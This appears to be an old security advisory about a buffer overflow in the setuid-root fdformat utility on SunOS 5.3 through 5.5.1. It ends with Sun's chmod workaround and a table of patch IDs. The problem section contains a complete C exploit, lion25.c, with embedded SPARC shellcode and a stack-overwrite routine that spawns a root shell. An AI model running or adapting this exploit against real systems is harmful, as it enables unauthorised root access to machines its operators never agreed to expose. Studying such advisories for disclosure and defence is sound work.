COMMAND

    /bin/fdformat

SYSTEMS AFFECTED

    SunOS versions 5.3,  5.4, 5.5, 5.5_x86,  5.5.1, and 5.5.1_x86  are
    vulnerable.

PROBLEM

    fdformat(1) is a utility for formatting both diskettes and  PCMCIA
    memory cards.   Due to insufficient  bounds checking on  arguments
    which  are  supplied  by  users,  it  is possible to overwrite the
    internal  stack  space  of  the  fdformat  program  while  it   is
    executing.   By  supplying  a  carefully  designed argument to the
    fdformat  program,  intruders  may  be  able  to force fdformat to
    execute arbitrary commands.  As fdformat is setuid root, this  may
    allow intruders to run arbitrary commands with root privileges.

    The buffer overflow bug in find_media() posted by Cristian Schipor
    is present  in /bin/fdformat  too distributions  the suid-exec bit
    on  and   it  is  owned   by  root).  By  exploiting fdformat with
    suid-exec bit on, anyone can gain a  root (or who is the owner  of
    fdformat) shell.

    My exploits (with argv[1] you  can change the STACK_OFFSET, +-  x,
    x=8*k k=1,2,3,...):

    ------------------------- lion25.c -------------------------------
    /*
    Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on
    2.5.1
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH 364
    #define EXTRA 400
    #define STACK_OFFSET 704
    #define SPARC_NOP 0xa61cc013

    u_char sparc_shellcode[] =

    "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
    "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
    "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
    "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
    "\x91\xd0\x20\x08"
    ;

    u_long get_sp(void)
    {
    __asm__("mov %sp,%i0 \n");
    }

    void main(int argc, char *argv[])
    {
    char buf[BUF_LENGTH + EXTRA + 8];
    long targ_addr;
    u_long *long_p;
    u_char *char_p;
    int i, code_length = strlen(sparc_shellcode),dso=0;

    if(argc > 1) dso=atoi(argv[1]);

    long_p =(u_long *) buf ;
    targ_addr = get_sp() - STACK_OFFSET - dso;
    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

    char_p = (u_char *) long_p;

    for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

    long_p = (u_long *) char_p;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

    printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
    targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
    execl("/bin/fdformat", "fdformat", & buf[1],(char *) 0);
    perror("execl failed");
    }

    ----------------------- end of lion25.c --------------------------

SOLUTION

    Sun  recommends,  as  a  workaround,  that  setuid  permission  be
    removed from  the eject  and fdformat  programs by  using commands
    such as the following:


        chmod 555 /usr/bin/fdformat

    The same vulnerabilities have  been fixed in the  upcoming release
    of Solaris 2.6.  The  vulnerabilities relating to fdformat in  the
    volume management library are fixed by the following patches:

        OS version              Patch ID
        ----------              --------
        SunOS 5.5.1             104776-01
        SunOS 5.5.1_x86         104777-01
        SunOS 5.5               103024-02
        SunOS 5.5_x86           103044-02
        SunOS 5.4               101907-14
        SunOS 5.4_x86           101908-14
        SunOS 5.3               101331-07